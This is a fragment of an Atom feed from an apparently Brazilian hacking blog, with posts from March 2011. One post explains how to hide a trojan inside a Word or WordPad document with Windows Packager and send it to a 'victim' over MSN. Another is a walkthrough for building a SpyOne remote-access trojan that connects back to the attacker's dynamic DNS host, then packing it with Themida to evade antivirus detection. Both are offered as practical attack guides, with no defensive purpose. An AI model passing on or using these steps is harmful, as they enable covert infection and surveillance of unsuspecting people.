&lt;a href="http://feedads.g.doubleclick.net/~a/uzVS9h8D4Er5QYPxLlkJ_FB9imk/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/uzVS9h8D4Er5QYPxLlkJ_FB9imk/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/QoXA5PTlI7I" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/8110405364747421994/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/criando-um-site-com-um-auto-infect.html#comment-form" title="1 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/8110405364747421994?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/8110405364747421994?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/QoXA5PTlI7I/criando-um-site-com-um-auto-infect.html" title="Criando um site com um Auto-Infect" /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>1</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/criando-um-site-com-um-auto-infect.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUEERX4zeCp7ImA9WhZTGE8.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-3823025617368533360</id><published>2011-03-22T14:00:00.000-07:00</published><updated>2011-03-22T14:00:04.080-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-22T14:00:04.080-07:00</app:edited><title>Trojans em Documentos de Texto.</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #5f5f5f; font-family: arial; font-size: 13px; font-weight: bold; line-height: 14px;"&gt;Utilize esta ferramenta para inserir um trojan&lt;br /&gt;
em arquivo de texto, e assim, poder mandar&lt;br /&gt;
para uma pessoa via MSN sem problemas,ou seja não precisa zipar.&lt;br /&gt;
E então achei interessante postar aqui, trata-se do packager.&lt;br /&gt;
&lt;br /&gt;
Vai em Iniciar&amp;gt; Executar&amp;gt; e digite Packager.&lt;br /&gt;
&lt;br /&gt;
Abra uma figura com qualquer editor de imagem, selecione&lt;br /&gt;
a figura e depois cole no PACKAGER, depois selecione menu&lt;br /&gt;
arquivo e importar, e escolha o server que for.&lt;br /&gt;
&lt;br /&gt;
Vai no menu editar e escolha copiar pacote, depois abra o&lt;br /&gt;
wordpad que é o melhor se a vítima possuir só ele, porque se&lt;br /&gt;
a vitima abrir pelo word ele vai exibir aviso de risco de vírus&lt;br /&gt;
com o wordpad aberto ou word mande colar especial.&lt;br /&gt;
E escolha pacote. Já deu pra notar que estamos&lt;br /&gt;
criando um pacote para wordpad ou word.&lt;br /&gt;
&lt;br /&gt;
Aí é só salvar o arquivo como doc, e mandar para pessoa.&lt;br /&gt;
Você use a sua criatividade para colocar uma legenda pedindo&lt;br /&gt;
pra pessoa da 2 cliques na figura. Ou então, faça como eu, eu&lt;br /&gt;
cliquei com botão direito da figura e fui em propriedade do objeto&lt;br /&gt;
e escolhi um ícone de instalação do pacote e botei uma legenda.&lt;br /&gt;
Fica um ícone com a seguinte legenda 'Para visualizar a imagem&lt;br /&gt;
instale o pacote.Se a pessoa tiver no word e der 2 cliques, vai vir&lt;br /&gt;
a mensagem dizendo que pode ser um vírus, caso ela clique em&lt;br /&gt;
instalar o pacote o ícone sumirá e no lugar do ícone vai aparecer&lt;br /&gt;
a imagem. Caso ela não tenha o word instalado, ela irá conseguir&lt;br /&gt;
abrir no wordpad, o wordpad não avisa nada ele instala direto..&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-3823025617368533360?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/I4zDpSMXnkFs3NXW9nQ8jdVL-is/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/I4zDpSMXnkFs3NXW9nQ8jdVL-is/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/I4zDpSMXnkFs3NXW9nQ8jdVL-is/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/I4zDpSMXnkFs3NXW9nQ8jdVL-is/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/F1l56LpYqvk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/3823025617368533360/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/trojans-em-documentos-de-texto.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/3823025617368533360?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/3823025617368533360?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/F1l56LpYqvk/trojans-em-documentos-de-texto.html" title="Trojans em Documentos de Texto." /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/trojans-em-documentos-de-texto.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUIGSX46fyp7ImA9WhZTGE8.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-1461439380173044838</id><published>2011-03-22T13:58:00.001-07:00</published><updated>2011-03-22T13:58:48.017-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-22T13:58:48.017-07:00</app:edited><title>Tutorial completo Spyone</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;1- Baixe o SpyOne em nossa seção de downloads !&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;2- Abra o SpyOne e clique em New Server:&lt;br /&gt;
&lt;img height="417" src="http://img250.imageshack.us/img250/6189/imagem1al7.jpg" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="556" /&gt;&lt;/div&gt;&lt;div&gt;&lt;strong&gt;Observe que todos os checkbox que estão envolvidos pelo circulo marron estão marcados.&lt;/strong&gt;&lt;/div&gt;&lt;div&gt;&lt;strong&gt;desmarque todos e tbm desmarque o comprimir.&lt;/strong&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;A seta verde indica meu DNS (meu no-ip).&lt;/strong&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Depois clique em Criar Server e pronto.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;img src="http://img254.imageshack.us/img254/1262/imagem2ql2.jpg" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /&gt;&lt;/div&gt;&lt;div&gt;&lt;strong&gt;Agora vo mostrar como configurar sua rede para receber conexão reversa sem problemas.&lt;/strong&gt;&lt;/div&gt;&lt;div&gt;&lt;strong&gt;1- No Menu Iniciar vai em Conectar-se e em mostrar todas as conexões:&lt;/strong&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;img src="http://img250.imageshack.us/img250/1121/imagem3md5.jpg" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;2- Em conexão local clique com o butão direito do mouse e entre em propiedades:&amp;nbsp;&lt;/strong&gt;&lt;br /&gt;
&lt;img src="http://img254.imageshack.us/img254/5020/imagem4ex3.jpg" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;3- Ja em propriedades escolha a opção tcp/ip e clique em propriedades como indica a seta verde:&amp;nbsp;&lt;/strong&gt;&lt;br /&gt;
&lt;img src="http://img254.imageshack.us/img254/8109/imagem5qs5.jpg" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;4- Configure exatamente igual a imagem abaixo, e clique em ok e pronto.&amp;nbsp;&lt;/strong&gt;&lt;br /&gt;
&lt;img src="http://img411.imageshack.us/img411/9426/imagem6jw2.jpg" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;Agora vo mostrar como deixa o server do spyone indetectavel usando o themida.&lt;/strong&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;1- Baixe o Themida em nossa seção de downloads !&lt;/strong&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;2- Abra e themida e sigua as intruções abaixo:&amp;nbsp;&lt;/strong&gt;&lt;br /&gt;
&lt;img src="http://img88.imageshack.us/img88/8161/imagem7zj8.jpg" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;Clique onde a seta vermelha indica e encontre o server gerado.&lt;/strong&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;Logo apos clique onde a seta azul indica.&lt;/strong&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;3- Vai abrir uma caixa com esses butões aperta onde a seta vermelha indica “protect”:&amp;nbsp;&lt;/strong&gt;&lt;br /&gt;
&lt;img src="http://img253.imageshack.us/img253/3765/imagem8rr3.jpg" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;4- Após você clicar começa um processo de compressão do arquivo, aguarde ate o fim.&amp;nbsp;&lt;/strong&gt;&lt;br /&gt;
&lt;img src="http://img253.imageshack.us/img253/8346/imagem9iv6.jpg" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;5- Apos completar voce aperta onde e seta rosa indica:&amp;nbsp;&lt;/strong&gt;&lt;br /&gt;
&lt;img src="http://img411.imageshack.us/img411/6922/imagem10dr5.jpg" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;Pronto, seu trojan esta indetectável, agora escolha a vítima e teste sua criação..&lt;/strong&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-1461439380173044838?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/_m-fTGJN9W8P2sThYXn_df4SIwM/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/_m-fTGJN9W8P2sThYXn_df4SIwM/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/_m-fTGJN9W8P2sThYXn_df4SIwM/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/_m-fTGJN9W8P2sThYXn_df4SIwM/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/WHo9jTJloLs" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/1461439380173044838/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/tutorial-completo-spyone.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/1461439380173044838?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/1461439380173044838?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/WHo9jTJloLs/tutorial-completo-spyone.html" title="Tutorial completo Spyone" /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/tutorial-completo-spyone.html</feedburner:origLink></entry></feed>

